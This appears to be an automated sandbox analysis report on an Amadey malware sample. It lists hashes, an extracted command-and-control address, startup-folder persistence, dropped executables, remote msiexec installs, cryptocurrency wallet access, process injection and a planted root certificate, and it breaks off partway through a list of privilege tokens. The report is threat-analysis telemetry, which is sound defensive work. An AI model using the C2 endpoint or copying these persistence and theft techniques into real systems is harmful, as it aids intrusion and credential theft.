Analysis
-
max time kernel
141s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
19/08/2023, 06:14
Static task
static1
Behavioral task
behavioral1
Sample
3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe
Resource
win7-20230712-en
General
-
Target
3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe
-
Size
3.3MB
-
MD5
e24bdc9074518cf8e0afd9f017855eee
-
SHA1
afdf930278ae74d600d31463ba31ec2543ceb121
-
SHA256
3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3
-
SHA512
1e22b023695de9cff675366fd9433c087533f1a4b6c1a2ec64156fa77d2bc4f5f48264418fcc3273dd90d8c9d3b7aec8db08bf039abf5b86be8172c979016e8e
-
SSDEEP
49152:xWtfl3xiDZjSPQaLOpU0dpBYYZFfsqWGXwuO6Bpp5DKXYpnF4tk11zppI04zmHZZ:ctfl0kYax0dMiNsqWGXwtyvKa
Malware Config
Extracted
amadey
3.86
45.9.74.182/b7djSDcPcZ/index.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 25 2800 msiexec.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MargostickBIO.lnk qdgwqhsjogxwbnohwsd.exe -
Executes dropped EXE 4 IoCs
pid Process 2496 MSIA84E.tmp 852 MpCopyAccelerator.exe 4820 MpCopyAccelerator.exe 5068 qdgwqhsjogxwbnohwsd.exe -
Loads dropped DLL 12 IoCs
pid Process 3512 MsiExec.exe 3512 MsiExec.exe 3512 MsiExec.exe 3512 MsiExec.exe 4584 MsiExec.exe 4584 MsiExec.exe 4584 MsiExec.exe 4584 MsiExec.exe 4584 MsiExec.exe 4584 MsiExec.exe 852 MpCopyAccelerator.exe 4820 MpCopyAccelerator.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 1472 msiexec.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\K: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\M: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\N: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\X: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\T: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\R: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\U: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\W: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\Y: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\Z: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\O: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\J: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\L: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\Q: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\B: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe File opened (read-only) \??\S: 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4820 set thread context of 3124 4820 MpCopyAccelerator.exe 98 PID 5068 set thread context of 2508 5068 qdgwqhsjogxwbnohwsd.exe 114 -
Drops file in Windows directory 13 IoCs
description ioc Process File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIA84E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA405.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI9FCB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA143.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA2CB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA378.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA4F1.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI98F4.tmp msiexec.exe File created C:\Windows\Installer\e57a5c8.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA678.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 552 timeout.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 2800 msiexec.exe 2800 msiexec.exe 4820 MpCopyAccelerator.exe 3124 cmd.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 4712 explorer.exe 5068 qdgwqhsjogxwbnohwsd.exe 5068 qdgwqhsjogxwbnohwsd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4820 MpCopyAccelerator.exe 3124 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 2800 msiexec.exe Token: SeCreateTokenPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeAssignPrimaryTokenPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeLockMemoryPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeIncreaseQuotaPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeMachineAccountPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeTcbPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeSecurityPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeTakeOwnershipPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeLoadDriverPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeSystemProfilePrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeSystemtimePrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeProfSingleProcessPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeIncBasePriorityPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeCreatePagefilePrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeCreatePermanentPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeBackupPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeRestorePrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeShutdownPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeDebugPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeAuditPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeSystemEnvironmentPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeChangeNotifyPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeRemoteShutdownPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeUndockPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeSyncAgentPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeEnableDelegationPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeManageVolumePrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeImpersonatePrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeCreateGlobalPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeCreateTokenPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeAssignPrimaryTokenPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeLockMemoryPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeIncreaseQuotaPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeMachineAccountPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeTcbPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeSecurityPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeTakeOwnershipPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeLoadDriverPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeSystemProfilePrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeSystemtimePrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeProfSingleProcessPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeIncBasePriorityPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeCreatePagefilePrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeCreatePermanentPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeBackupPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeRestorePrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeShutdownPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeDebugPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeAuditPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeSystemEnvironmentPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeChangeNotifyPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeRemoteShutdownPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeUndockPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeSyncAgentPrivilege 3924 3bf4b365d61c1e9807d20e71375627450b8fea1635cb6ddb85f2956e8f6b3ec3.exe Token: SeEnableDelegationPrivilege 3924 